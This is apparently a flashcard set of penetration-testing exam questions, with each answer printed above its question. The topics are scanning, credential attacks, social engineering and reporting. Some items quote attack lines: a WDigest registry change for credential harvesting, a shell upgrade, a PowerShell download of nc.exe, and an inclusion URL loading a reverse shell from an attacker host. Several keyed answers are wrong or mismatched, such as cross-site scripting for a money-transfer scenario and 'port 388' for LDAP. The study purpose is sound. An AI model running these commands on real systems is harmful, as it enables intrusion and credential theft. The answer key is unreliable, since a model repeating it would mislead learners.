A penetration tester is conducting a test, and after compromising a single workstation, the tester is able to maneuver laterally throughout the domain with very few roadblocks. Which mitigation strategies should be recommended for the report to the client? (Choose three.)
The statement of work (SOW)
A penetration tester is currently in the middle of a test when the client asks the tester to add more addresses. Which of the following defines the target list that the tester can follow?
Open source intelligence (OSINT)
A penetration tester is in the middle of a penetration test and is gathering information without actively scanning the client. What type of information is being gathered?
Scope creep
A penetration tester is in the middle of conducting a penetration test specifically scoped to a single web application. The tester learns that the web server also contains a list of passwords to other servers at the target location. The tester notifies the client. The client then asks the tester to validate those servers. What has occurred once the tester proceeds with testing the passwords against the other servers?
A deauthentication attack
A penetration tester is monitoring a WPA2-PSK secured wireless network and is attempting to capture a handshake between a client and an access point. Even though the tester is monitoring the correct channel, he has been unsuccessful. Which type of attack would help the tester to obtain the handshake?
NetBIOS
A penetration tester is performing a gray box test for a client. During a network scan, she notices a host that has TCP port 139 open. She suspects this is a Windows system, so she runs the NBTSTAT command and discovers key information about the host. Which protocol on the remote host allowed the tester to gather this information?
SQLmap
A penetration tester is performing a gray box test for a client. The tester decides to run a brute-force attack against a SQL database. Which utility could be used to do this?
Mimikatz
A penetration tester is performing a gray box test for a client. The tester wants to try to generate a Kerberos "golden ticket" to compromise services within the target Active Directory domain. Which utility could be used to do this?
Swagger
A penetration tester is preparing to conduct API testing. Which of the following would be the most beneficial when preparing for this engagement?
Provides extended site validation
A security administrator is trying to encrypt communication by using the Subject Alternative Name (SAN) attribute of a certificate. What is a reason why the administrator should take advantage of SAN?
reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
A penetration tester is running a phishing test and receives a shell from an internal computer that is running the Windows 10 operating system. The tester decides that he wants to use Mimikatz to perform credential harvesting. The tester wants to allow for credential caching. Which of the following registry changes would allow this?
Conduct an LLMNR/NETBIOS-NS query.
A penetration tester is conducting a penetration test of a client's network and has managed to obtain access to a laptop. What would be the tester's next step to obtain credentials from the laptop?
Local file inclusion; Remote file inclusion
A penetration tester is trying to exploit a web application used by the target organization. He uses a form field in the web application to upload a malicious executable to the web server. Which of the following describe this kind of exploit? (Choose two.)
use auxiliary/server/socks4a
A penetration tester is using Metasploit. What command would allow the tester to access a private network from the Internet?
-T4
A penetration tester is using nmap to scan hosts on the target network. The client has a lax security posture and employs a relatively inexperienced IT staff. Which timing option could she consider using with nmap to speed up her scans?
-T1
A penetration tester is using nmap to scan hosts on the target network. The client uses an aggressive IPS tool and employs an experienced IT staff that she needs to avoid. Which timing option should she use with nmap to avoid detection? (Assume that time is not an issue.)
Dictionary attack
A penetration tester is using social media to gather information about different employees at a company. The tester has created a list of popular words used frequently in the employees' profiles. What type of attack could this information be used for?
Executive summary
A penetration tester is writing a report that outlines the overall level of risk to operations. In which part of the report should the tester include this information?
RFID cloning
A penetration tester learns that the target organization's employees use RFID access badges to unlock doors within the facility. She identifies a restaurant where employees of the organization commonly gather for lunch. The next day, she sits at a table near a group of employees in the restaurant with a small, hidden RFID reader. She captures the RFID signature from the employees' badges and then creates fake access badges using the RFID signatures. What is this technique called?
Piggybacking
A penetration tester observes that many employees of the target organization congregate outside the back door of the facility at 10 a.m. and 2 p.m. to smoke cigarettes. The next day, the tester joins the group and pretends to smoke with them. When the group finishes smoking, the tester walks through the back door behind the group. What is this technique called?
Dumpster diving
A penetration tester observes that the target organization's garbage is picked up early in the morning every Tuesday. Late Monday night, she climbs into the organization's garbage receptacle and gathers discarded documents, optical discs, and storage devices such as flash drives. What kind of exploit occurred in this scenario?
Credential brute-forcing
A penetration tester reviews social media accounts owned by the target organization's CIO and makes a list of possible passwords such as her spouse's name, pet's name, favorite sports teams, and so on. The tester tries to log on to the CIO's account using one possible password after another, trying to find one that works. What type of authentication exploit is this?
Dumpster diving
A penetration tester rifles through the target organization's garbage and finds an optical disc. He reads the disc on his laptop and finds that it contains several very sensitive files from human resources. What kind of exploit occurred in this scenario?
Dumpster diving; Badge cloning
A penetration tester rummages through the target organization's garbage and finds a discarded access badge. She replicates a new badge with her picture using the discarded badge as a model. She uses a device to read the discarded badge's magnetic stripe and replicate it on the fake badge. Which techniques were used by the tester in this scenario? (Choose two.)
-T3
A penetration tester runs an nmap scan without specifying a timing option. Which one is used by default?
To remove the persistence
A penetration tester runs the chkconfig --del <servicename> command at the end of an engagement. What is the reason the tester may have done this?
Upgrading the shell
A penetration tester runs the following from an exploited machine: python -c 'import pty; pty.spawn("/bin/bash")' What action is the tester performing?
Scarcity
A penetration tester sends a phishing email to the employees of the target organization. The email purports to be offering iPads for an absurdly low price. However, there are only 25 left at this price. The link in the email leads to a fake website that uses a drive-by-download script that drops a keylogger on the employee's computer. What motivation factor did the penetration tester use in this scenario?
Social proof
A penetration tester sends a phishing email to the employees of the target organization. The link in the email leads to a fake website that lists more than 1,000 reviews with an average rating of 4.9 stars. What motivation factor did the penetration tester use in this scenario?
Urgency
A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be a fellow employee who has forgotten her password. The email indicates she has a presentation in a few minutes and can't access her presentation files on a shared network drive. She asks the employee to "loan" her his username and password so she can log on and get the files. What motivation factor did the penetration tester use in this scenario?
Authority
A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be an agent with the Federal Bureau of Investigation (FBI). The email indicates that the employee's manager is being investigated for embezzlement and asks the employee to reply with sensitive internal information. What motivation factor did the penetration tester use in this scenario?
Authority
A penetration tester sends an email to a sales rep of the target organization, claiming to be the CEO of one of the organization's most important clients. The email asks the employee to create a VPN account to allow the CEO access to certain files on the organization's network. The email threatens to terminate the business relationship if this doesn't happen. What motivation factor did the penetration tester use in this scenario?
Urgency
A penetration tester sends an email to an employee of the target organization, claiming to be a sales rep on the road. She claims in the email that her VPN connection from her hotel is running extremely slow and that she can't access her client's data. If she doesn't get the data, she will lose the sale. The message asks the employee to email her a copy of the files. What motivation factor did the penetration tester use in this scenario?
Social proof; Urgency
A penetration tester sends an email to an employee of the target organization, claiming to be a sales rep on the road. She claims in the email that she forgot her VPN password and now it is locked because she tried too many wrong ones. She asks the employee for his VPN username and password so she can log on and update the customer database with a huge new order. She mentions in the email that one of the target employee's coworkers has done this for her in the past and it wasn't a big deal. What motivation factors did the penetration tester use in this scenario? (Choose two.)
Report any critical findings. Report indicators of compromise. Report a server that becomes unresponsive.
A penetration tester should have a customer's contact information available at all times. Which of the following should penetration testers immediately report to their client? (Choose three.)
Gray box
A penetration tester uses a typical employee email account to send a phishing email exploit to managers and executives within the target organization. The goal is to see how many actually fall for the exploit and click the link in the message. What kind of penetration test is being performed in this scenario?
-sS
A penetration tester uses the nmap utility to send a TCP SYN packet to a target host. The target host responds with a SYN ACK packet, but instead of finishing the connection, nmap sends a reset packet to the target host. Which option did the tester use with the nmap command?
Tailgating
A penetration tester waits in the target organization's parking lot early in the morning until she sees an employee heading toward the front door. She walks up behind the employee while clumsily carrying several large boxes. She asks the employee to hold the door for her and is able to enter the facility. What is this technique called?
Piggybacking
A penetration tester waits in the target organization's parking lot until she sees a large group of employees returning from lunch. She inserts herself quietly at the back of the group. The first person in the group uses his badge to unlock a secured door. The penetration tester is able to move through the door with the rest of the group. What is this technique called?
Maltego; Shodan
A penetration tester wants to conduct open-source intelligence (OSINT) data collection from publicly available sources. Which of the following tools can be used? (Choose two.)
Hydra
A penetration tester wants to perform a credential brute-force attack on a client's application. Which of the following tools should be used?
Shodan
A penetration tester wants to perform passive reconnaissance on the client's external domain. What would be the best choice to use?
nmap 192.168.1.0/24 -Pn
A penetration tester wants to run a port scan on all hosts on the 192.168.1.0 subnet (with a subnet mask of 255.255.255.0) without actually discovering the hosts first. Which command should she use?
responder
A penetration tester wants to target the NetBIOS name service. Which command is most likely to be used to exploit the NetBIOS name service?
msfconsole
A penetration tester wants to use Metasploit. Which of the following commands will start the Metasploit database?
By comparing hashes to identify known values
A penetration tester wants to use rainbow tables against a password file that has been captured. How does the rainbow table crack passwords?
-iL -sV
A penetration tester, using nmap, has been asked to conduct OS fingerprinting using a company-provided text file that contains a list of all the IP addresses. What switches would you need to include in your code to conduct OS fingerprinting using the text file? (Choose two.)
Discovery
A ping sweep is an example of which type of vulnerability scan?
Advanced persistent threat
A red team assessment is typically conducted in a manner consistent with what type of threat actor?
Samples of the Simple Object Access Protocol (SOAP) project files
A security analyst is attempting to construct specialized XML files to test the security of the parsing functions of a Windows application during testing. Before starting to test the application, which of the following should the analyst request from the client?
Passive scan
A security analyst is attempting to identify vulnerabilities in a customer's web application without affecting the system or its data. Which of the following best describes the type of vulnerability scanning being performed?
Block URL redirections.
A security analyst is monitoring the Web Application Firewall (WAF) logs and has discovered that there was a successful attack against the following URL: https://sample.com/index.php?Phone=http://iattackedyou.com/stuffhappens/revshell.php. What remediation steps should be taken to prevent this type of attack from happening again?
Nothing; they must do their own discovery.
A security analyst is planning on using black box penetration testing. This type of strategy will provide the tester with which of the following?
Directory traversal
A security analyst is reviewing the logs for a web application. The analyst finds a suspicious request. The request shows the following URL: http://www.companysite.com/about.php?i=../../../etc/passwd. What is this request attempting?
Rules of engagement (RoE)
A security analyst receives an outline of the scope of an upcoming penetration test. This document contains the times during which each host can be scanned as well as the IP addresses. What document would contain this information?
-sS, SYN and RST packets
A stealth scan in nmap is denoted by the __________ flag and leverages the use of __________ when probing ports.
To provide API descriptions and test cases
A Swagger document is intended to serve what purpose?
High
A system under test is determined to be running an insecure protocol. What severity level would you give this finding if the device were connected to the Internet?
Fence jumping
A target organization's facility is surrounded by a tall chain-link fence topped with barbed wire. A penetration tester observes that a remote section of the fence is overgrown with shrubbery. Late at night, she uses bolt cutters to cut a slit in the fence that she can slip through at a later time. What is this technique called?
Red team penetration test
A team of testers is conducting an assessment for an organization. The team is not concerned with assessing a broad range of vulnerabilities. Instead, they are conducting a coordinated attack governed by very narrow objectives. The rules of engagement specify that they can use physical, electronic, and social exploits to achieve their objective. What kind of penetration test is happening in this scenario?
Hydra
A tester has captured NTLM hashes and wants to conduct a pass-the-hash attack. Unfortunately, the tester doesn't know which systems on the network may accept the hash. What tool should the tester use to conduct the test?
Browser Exploitation Framework (BeEF)
A penetration tester wants to deploy a malicious website as part of the test to exploit the browsers belonging to the client's employees. What tool can the tester utilize?
Keylogger
A user has noticed that their machine has been acting unpredictably over the past week. They have been experiencing slowness and input lag. The user has found a few text files that appear to contain bits of their emails and some instant messenger conversations. The user runs a virus scan where nothing is detected. What type of malware may be affecting this machine?
Cross-site scripting
A web application has been developed to target browsers and permit access into different banking accounts. This application takes a few dollars from one account and sends it to a foreign account. What type of attack has just occurred?
Hard-coded credentials
A web application programmer has included the username and password required to access a database instance within the application's PHP code. This is an example of which insecure code practice?
threat actor
A(n) __________ is an individual or group with the capability and motivation necessary to manifest a threat to an organization and deploy exploits against its assets.
While testing is being performed
When should you start to write a penetration testing report?
Target = [{"HostName":"FS1"}]
As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
sslyze
As part of the information gathering process during a gray box penetration test, you need to perform a certificate inspection on the target organization's internal web server. Which utility could you use on your Kali Linux laptop to do this?
Identify assets
According to Microsoft's published procedures, what is the first step in threat modeling?
Document technical exploits that were effective during the test; Identify exploits that were not effective during the test.
After completing a penetration test for a client, you meet with your penetration testing team to review lessons learned. What should you do in this meeting? (Choose two.)
Immediately halt testing and call an emergency meeting with the client
After obtaining a low-privilege shell on a target server and beginning work on privilege escalation, you identify a netcat process running on an unprivileged port returning a /bin/bash instance to an IP address that is not part of any address block used by either your penetration testing organization or the client. What is the appropriate action to take in this case?
The device is tuned more toward false positives.
After several attempts, a tester was able to gain unauthorized access through a biometric sensor by using the tester's own fingerprint without exploitation. What happened with the biometric device that allowed the tester to gain access?
Employee bank accounts managed by a different company
All the following assets may be candidates for target selection for a penetration test except:
Rival corporations; Third-party media organizations
All the following may typically be considered stakeholders in the findings of a penetration test except which two?
Man-in-the-middle
An ARP spoofing attack is categorized as which type of exploit?
Nation-state
An attacker carries out an attack against a government contractor in a neighboring country, with the goal of gaining access through the contractor to the rival country's governmental network infrastructure. The government of the attacker's own country is directing and funding the attack. What type of threat actor is this?
Script kiddie
An attacker downloads the Low Orbit Ion Cannon from the Internet and then uses it to conduct a denial-of-service attack against a former employer's website. What kind of attacker is this?
Hacktivist
An attacker has attacked a government agency because he or she is unhappy with a new law that has been passed. What type of threat actor is this?
Hacktivist
An attacker who is a passionate advocate for brine shrimp attacks and defaces the website of a company that harvests brine shrimp and sells them as fish food. What type of attacker is this?
Malicious insider
An employee has just received a very negative performance review from his manager. The employee feels the review was biased and the poor rating unjustified. In retaliation, the employee accesses confidential employee compensation information from an HR database server and posts it anonymously on Glassdoor. What kind of attacker is this?
Implement an HTTP downgrade attack.
An evil twin has been successfully deployed by a penetration tester and is beginning to see some victim traffic. What would be the next step that the tester would want to take to capture all of the unencrypted web traffic from the victim?
$Target.HostName = 'FS1'
As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
-p U:20,T:21,22
Which command option will cause nmap to scan just UDP port 20 and TCP ports 21 and 22?
Once a year; Whenever significant changes are made to the network infrastructure
An online retailer directly handles payment processing for credit card orders. As such, the credit card companies require the organization to be PCI-DSS compliant. When must this organization conduct penetration testing? (Choose two.)
Transference
An organization has recently learned that its facility has been built within a few hundred yards of a major fault line. The management team decides to purchase an extended insurance policy that will cover a loss of business operations should an earthquake occur. Which type of risk response is described in this scenario?
False positive
An organization is using a tool to perform a source code review. The penetration tool incorrectly identifies a vulnerability. What is it called when this happens?
Supply chain
An organization's network was recently hacked. The attackers first compromised the weak security used by one of the organization's contractors. Then they used the contractor's authentication credentials to gain access to the organization itself. Which type of penetration assessment could have prevented this?
WiFite; Kismet
As a part of a black box penetration test, you've discovered that the target organization's wireless network signal is emanating out into the parking lot and across the street. You want to access the internal network using this wireless network radio signal. However, the wireless network is encrypted. Which wireless compromise tools could you use to do this? (Choose two.)
echo $TargetHost
As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to display the value of a variable named TargetHost on the screen. Which command will do this?
Target[HostName]=FS1
As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
-gt
As a part of a gray box penetration test, you need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two integer variables to test whether one is numerically greater than the other. Which relational operator should you use?
<> ; !=
As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables that tests whether they are not equal. Which relational operators could you use? (Choose two.)
==
As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use?
_Target = {"HostName" => "FS1"}
As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
==
As a part of a gray box penetration test, you need to create a Ruby script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables to test whether they are equal. Which relational operator should you use?
nmap; hping
As a part of a penetration test, you need to establish an active connection to the computer systems and devices at the target organization to enumerate and fingerprint them. Which tools could you use to do this? (Choose two.)
John the Ripper; Cain and Abel
As a part of a penetration test, you need to gather user account names and passwords from the passwd and shadow files from a Linux server. Which utilities could you use to do this? (Choose two.)
OWASP ZAP; Nessus
As a part of a penetration test, you need to perform an in-depth scan of a target to identify vulnerabilities, such as missing updates or misconfigured security settings. Which utilities could you use to do this?
whois; nslookup
As a part of a penetration test, you need to perform reconnaissance on the target organization to passively gather information. Which tools could you use to do this? (Choose two.)
ncat
As a part of a penetration test, you want to access a shell session on a target Windows server. Which utility could be used to do this?
IDA; Hopper
As a part of a penetration test, you want to reverse compile the executable for an in-house developed application used by the target organization. Which of the following tools can be used to do this? (Choose two.)
Fence jumping
As a penetration tester approaches the main entrance to the target organization's physical facility, she notices that a turnstile is used to control access. She carefully steps over the turnstile instead of walking through it. What is this technique called?
hashcat
As a penetration tester, you want to improve your password cracking speed by building a specialized system with multiple video boards installed. Which tool can take advantage of multiple GPUs for password cracking?
nmap 192.168.1.200 -p http,https ; nmap 192.168.1.200 -p 80,443
As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network and see whether it has a web server installed and running. Which nmap commands will do this? (Choose two.)
nmap 192.168.1.200 --top-ports 1000 --exclude-ports 53
As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network for the 1000 most popular network services to see whether they are installed and running. However, you already know this host is running the DNS service, so you want to skip this port in the scan. Which nmap command will do this?
Code signing
As defined by the OWASP Mobile Security Testing Guide, which core feature of the iOS security architecture ensures that only applications explicitly approved by Apple can run on the device?
Set to promiscuous mode.
As part of a gray box penetration test, you need to capture packets on a wired network. How must the wired network interface in your laptop be configured to accomplish this?
Connect your laptop to a mirror port on the switch.
As part of a gray box penetration test, you need to capture packets on a wired network. You've configured the network interface in your laptop to accept all frames transmitted on the network medium, and you have installed Wireshark. However, when you run Wireshark, you only see frames that are addressed specifically to your laptop. How can you fix this?
The network uses a switch.
As part of a gray box penetration test, you need to capture packets on a wired network. You've configured the network interface in your laptop to accept all frames transmitted on the network medium, and you have installed Wireshark. However, when you run Wireshark, you only see frames that are addressed specifically to your laptop. Why did this happen?
dig axfr @nameserver target_domain ; host -t axfr target_domain nameserver
As part of the information gathering phase of a black box penetration test, you need to perform a DNS zone transfer of the target organization's domain. Which of the following commands could you use to do this? (Choose two.)
Carefully document everything you do as you conduct the test.
As you are conducting a penetration test for a client, you want to make sure the post-engagement cleanup process goes smoothly. What should you do to accomplish this?
Static code analysis
Austin is performing a white box penetration test. The target organization relies heavily on an application that was developed by internal programmers. The test scope specifies that he be given access to this application's source code. Austin has an extensive programming background, so he analyzes the code line by line looking for vulnerabilities. What kind of application analysis is happening in this scenario?
Try to compromise an internal host and use it as a pivot.
Brittany is running a black box penetration test. She wants to run a vulnerability scan of the target organization's internal network. What should she do?
Alteration
Brittany is running a gray box penetration test. She discovers a flaw in an HR web application. Using a SQL injection attack, she can add or remove hours to or from an employee's timecard for the current pay period. Which penetration testing goal has she accomplished?
It allows for interactive or non-interactive command execution.
Bash is a command shell and language interpreter that is available for operating systems such as Linux, Mac OS X, and even Windows. The name bash is an acronym for the Bourne-Again shell. What does a shell do?
Pass-the-hash
Because password hashes cannot be reversed, instead of trying to figure out a user's password, what type of attack can be used to log in to another client or server?
Recommend increased password complexity requirements. Recommend requiring that all employees take security awareness training. Recommend upgrading the cipher suite used for the VPN solution.
By using phishing, a penetration tester was able to retrieve the initial VPN user domain credentials from a member of the IT department. Then the tester obtained hashes over the VPN and effortlessly cracked them by using a dictionary attack. The tester should recommend which of the following remediation steps to the client? (Choose three.)
Passive information gathering
What is the process of assessing a target to collect preliminary knowledge about systems, software, networks, or people without directly engaging the target or its assets?
Enumeration
What is the process of finding all available information on a target system or service in support of developing a plan of attack?
Kerberoasting
During a gray box penetration test, the tester logs on to the target organization's domain and requests a service principal name (SPN) for a registered service. A ticket is received, and the tester takes it offline and attempts to crack its encryption. What is this exploit called?
Zmap
Censys was created at the University of Michigan by the team of researchers who also developed what wide-scale Internet-scanning tool?
PSExec
Complete the following command to launch the calculator on a compromised Windows system: ___________ \\VICTIM -d -i calc.exe
Burp Suite; OWASP ZAP
During a gray box penetration test, the tester needs to proxy connections between the target organization's web application server and client systems running web browsers. Which web proxy penetration testing tools could the tester use to do this? (Choose two.)
To cause a full or partial DoS condition
What is the purpose of jamming wireless signals or causing wireless network interference?
OSSTMM
What penetration testing methodology was created by Pete Herzog?
The New-Object System.Net.WebClient PowerShell script is downloading a file from 192.168.78.147.
Consider the following example: (New-Object System.Net.WebClient).DownloadFile("http://192.168.78.147/nc.exe","nc.exe") What is this code doing?
Read, write, execute
Consider the following example: omar@ares:~$ ls -l topsecret.txt -rwxrwxr-- 1 omar omar 15 May 26 21:15 topsecret.txt What permissions does the user omar have in the topsecret.txt file?
SQL injection
Consider the following string: Ben' or '1'='1 This string is an example of what type of attack?
Developers who design IoT devices are not as concerned with security.
Consumer-based Internet of Things (IoT) devices are usually less secure than systems that are designed for conventional desktop computers. Why is this statement true?
De-escalation
During a penetration test, the client organization begins to receive complaints from remote workers indicating that the organization's VPN is down. The network administrator discovers a local area network denial (LAND) attack underway that is aimed at the company's VPN server at the edge of the network. The remote workers are unable to work, so the administrator calls the penetration tester and asks them to dial back the attack. What is this communication path called?
Domain administrator fax
Domain registration information returned on a WHOIS search does not include which of the following?
Default credentials attack
During a black box penetration test, the tester discovers that the organization's wireless access point has been configured with an administrative username of admin and a password of Admin. The tester gains administrative access to the access point. What kind of authentication exploit occurred in this scenario?
Replay attack
During a black box penetration test, the tester parks in the target organization's parking lot and captures wireless network signals emanating from the building with his laptop. By doing this, he is able to capture the handshake process used by an authorized wireless client as it connects to the network. He later resends this handshake on the wireless network, allowing his laptop to connect to the wireless network as that authorized client. What kind of exploit is this?
proxychains
During a black box penetration test, you need to use evasion to obscure your presence from system administrators in the target organization. Which tool could you use to do this?
Downgrade
During a gray box penetration test, the tester acts as a man-in-the-middle between a web server and an end user's workstation. When the user's browser requests a page from the web server using TLS 1.2, the tester alters the request and specifies that SSL 2.0 be used instead to protect the session. What kind of exploit has occurred in this scenario?
DLL hijacking
During a gray box penetration test, the tester creates a phishing campaign that tricks users into downloading a Trojan horse application that quietly replaces a key dynamic link library file on the local system with a modified version that loads a keylogger when executed. What is this type of exploit called?
Distributed denial of service (DDoS)
During a gray box penetration test, the tester decides to stress test a critical network router. She sends thousands of ping requests addressed to all of the hosts on the subnet. However, she spoofs the source address of the requests to the IP address of the network router. As a result, the router is flooded with ICMP echo response traffic that it didn't initiate, making it difficult for it to respond to legitimate network requests. What kind of exploit is this?
Denial of service (DoS)
During a gray box penetration test, the tester decides to stress test the target organization's file server by sending it a flood of half-open TCP connections that never actually get completed. What kind of exploit is this?
Default account settings exploit
During a gray box penetration test, the tester discovers that one of the organization's firewalls has been configured with an administrative username of admin and a password of Admin. The tester gains administrative access to the firewall and opens holes in it. What kind of authentication exploit occurred in this scenario?
Relay attack
During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester's workstation poses as the server to the client. The tester is able to modify the data in the packets and then send it on to the server. The tester's workstation poses as the client to the server. What kind of exploit is this?
Relay attack
During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester's workstation poses as the server to the client. The tester views the data in the packets but does not modify it before forwarding the data on to the server. What kind of exploit is this?
Kerberos exploit
During a gray box penetration test, the tester is able to run an exploit that enables her to receive a ticket-granting ticket (TGT) from the key distribution center (KDC) in the organization's Active Directory domain. What kind of authentication exploit occurred in this scenario?
Cross-site request forgery (CSRF)
During a gray box penetration test, the tester notices that the organization's human resources self-service web application uses Active Directory user accounts for authentication. It also includes a "Remember me" option on the login page. The tester sends an email message to high-level employees within the organization with the subject line "Check out this funny picture." When the email is opened, hidden HTML code actually sends an HTTP request to the self-service web application that changes the user's password. The attack relies on the saved session cookie from the site to work. What type of authentication exploit is this?
ARP spoofing
During a gray box penetration test, the tester sends a fake ARP broadcast message on the local network segment. As a result, her laptop's MAC address is now mapped to the IP address of another valid computer on the segment. What is this exploit called?
Session hijacking
During a gray box penetration test, the tester uses Wireshark to sniff the network traffic between an employee's web browser and a website and is able to capture the session cookie. The tester is then able to impersonate the victim without capturing the user's actual authentication credentials. What type of authentication exploit was used in this scenario?
Redirect attack
During a gray box penetration test, the tester uses phishing emails to send users to a logon page that looks like the target organization's human resources self-service page. The fake page is used to capture employees' credentials. What type of authentication exploit was used in this scenario?
ncat; netcat
During a gray box penetration test, the tester wants to be able to set up a bind shell exploit where a listener is set up on a compromised system on the target. Which remote access tools could be used to do this?
netcat
During a gray box penetration test, the tester wants to be able to set up a reverse shell exploit where a compromised system on the target network "calls home" to a listener set up on the tester's laptop to enable the tester to remote control the compromised system. Which remote access tool could be used to do this?
ARP spoofing
During a gray box penetration test, the tester wants to implement a downgrade man-in-the-middle attack to reduce the security of web browser sessions from TLS to SSL. What exploit can the attacker use to trick client workstations into thinking her workstation is the web server and vice versa?
Responder
During a gray box penetration test, the tester wants to poison queries for the target organization's domain controller in order to redirect client requests to the tester's laptop and capture usernames and hashed passwords. Which utility could be used to do this?
SMTP relay
During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send phishing emails to users within the organization. What is this exploit called?
Telnet to the SMTP server's IP address on port 25 and create the messages.
During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send whaling emails to the organization's CEO and CFO. How can you do this remotely from your laptop?
Windows
During a gray box penetration test, you run an nmap scan of a system discovered on the network. You find that TCP ports 139, 443, and 3389 are open. What operating system is most likely running on the system?
Spoof your laptop with the MAC address of an authorized device.
During a gray box penetration test, you try to connect your laptop to the target's wireless network. However, the target has implemented a NAC that is blocking your laptop from connecting to the production network. What can you do?
Session hijacking
During a penetration test of a web application, you determine that user session IDs (or tokens) are revealed in the URL after authentication. You further discover that these session IDs are predictably incremented values, and not randomly generated numbers or strings. To which of the following attack types would this application likely be susceptible?
De-escalation
During a penetration test, a tester gains physical access to the client's facility using pretexting and is able to trigger a fail-open event for all of the organization's electronic locking systems. As a result, all of the doors in the facility are unlocked. The client's internal security team calls the penetration tester and asks them to stop the attack and immediately re-enable the door locks. What is this process called?
De-confliction
During a penetration test, an individual is caught trying to piggyback into the client organization's facility. The trespasser claims to be a penetration tester and insists on being released. Prior to pressing criminal charges, a member of the client's IT staff calls the penetration tester to determine whether the trespasser is really a member of the penetration testing team. What is this communication path called?
Avoidance
During a penetration test, an unmonitored side door was left ajar by an employee, which the tester then used to gain physical access to the client's facility. To keep this from happening again, the client completely removes the door and its frame from the building and fills the space with concrete. Which type of risk response is described in this scenario?
Mitigation
During a penetration test, an unmonitored side door was left ajar by an employee, which the tester then used to gain physical access to the client's facility. To keep this from happening again, the client places a security guard in the hallway and instructs her to prevent unauthorized access. Which type of risk response is described in this scenario?
De-escalation
During a penetration test, the client organization begins to receive complaints from customers indicating that the organization's web server is very slow to respond or even crashes at times. The network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company's web server. Sales are being lost, so the administrator calls the penetration tester and asks them to stop the attack. What is this communication path called?
A tension wrench; A lock pick tool
What tools are required, at a minimum, to pick a lock? (Choose two.)
De-confliction
During a penetration test, the client organization's network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company's web server. The administrator calls the penetration tester to verify that the attack is part of the penetration test and not coming from a real attacker. What is this process called?
De-confliction
During a penetration test, the client organization's network administrator discovers a teardrop attack underway that is aimed at the company's perimeter router. The administrator calls the penetration tester to see whether the attack is part of the penetration test. What is this communication path called?
Hydra; Medusa
During a penetration test, the system administrator checks the log of the Linux server and notices thousands of unsuccessful login attempts. Which tool could the penetration tester be using? (Choose two.)
Cold boot attack
During a penetration test, the tester gains physical access to a Windows server system and reboots it from a flash drive that has a Linux distribution installed on it. She is able to bypass security and copy key files from the server to the flash drive for later cracking and analysis. What type of exploit occurred in this scenario?
Consult the rules of engagement to determine the next individual in the communications path
During a penetration test, you determine that you require additional information before testing a discovered web application, but your point of contact is unresponsive. Which of the following describes the best course of action in this situation?
Recommend they use SSL-enabled LDAP on port 636.
During a penetration test, you discover that an administrator is using clear-text LDAP on port 388 to update user accounts in their LDAP-compliant directory service, including user credentials. What should you recommend the client do to fix this?
Rewrite the application to encrypt passwords before they are saved in the database.
During a penetration test, you discover that your client uses a web application that was developed in-house that stores user passwords as clear text within a MySQL database. What should you recommend?
Exploit chaining
During a penetration test, you identify a live local file inclusion (LFI) vulnerability on a web application that allows you to see any file on the target system, including the /etc/passwd and /etc/shadow files. With this information, you feed password hashes from the shadow file into hashcat and crack them with a dictionary attack, ultimately finding a match that allows you to obtain a low-privilege shell on the target system. What is this an example of?
Brute force
During a penetration test, you identify and harvest encrypted user passwords from a web application database. You do not have access to a rainbow table for the encryption algorithm used, and do not have any success with dictionary attacks. What remaining attack method—typically one of last resort—could you leverage as an attacker to attempt to decrypt the passwords you have harvested?
Fear
During a penetration test, you send an email to the CFO of the target organization. The email claims that the webcam on the CFO's laptop has been clandestinely used to record him viewing pornography. The email threatens to post this video and notify his family, his employer, and the police if he doesn't respond with certain sensitive information about his company. Which motivation factor was used in this scenario?
Acceptance
During a penetration test, your testers discovered that they could easily copy confidential data to their personal mobile devices and then send that data to recipients outside the organization using their devices' mobile broadband connection. You recommend that they implement a mobile device management (MDM) system. However, the client has determined that such a measure is too expensive and complicated to implement. In fact, they will not implement any type of controls to prevent this from happening in the future. Which type of risk response is described in this scenario?
A clickjacking attack
During a web application penetration test, a penetration tester observes that the content security policy header is missing. What type of attack would the tester most likely perform next?
Services installed; The version of the operating system installed
During a white box penetration test, you use the nmap utility to scan an entire subnet for hosts. Once the scan is complete, you need to enumerate the systems found. What information do you need to identify for each device discovered? (Choose two.)
Responder
During an internal penetration test, several multicast and broadcast name resolution requests are observed moving through the network. A tester wants to impersonate network resources and collect authentication requests. What tool should be used?
Immediately alert the client with details of the findings.
During penetration testing of a client's core server, a tester discovers a critical vulnerability. What should the tester do next?
Following an attempted test, the system becomes unavailable. The system shows an indication of prior unauthorized access.
During the course of a penetration test, the tester needs to communicate with a client. Which of the following situations would cause this communication to occur? (Choose two.)
Set to monitor mode.
During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target's facility and attempt to capture data from its wireless network. You are parked in the organization's parking lot. How must the wireless network interface in your laptop be configured to do this?
airodump-ng
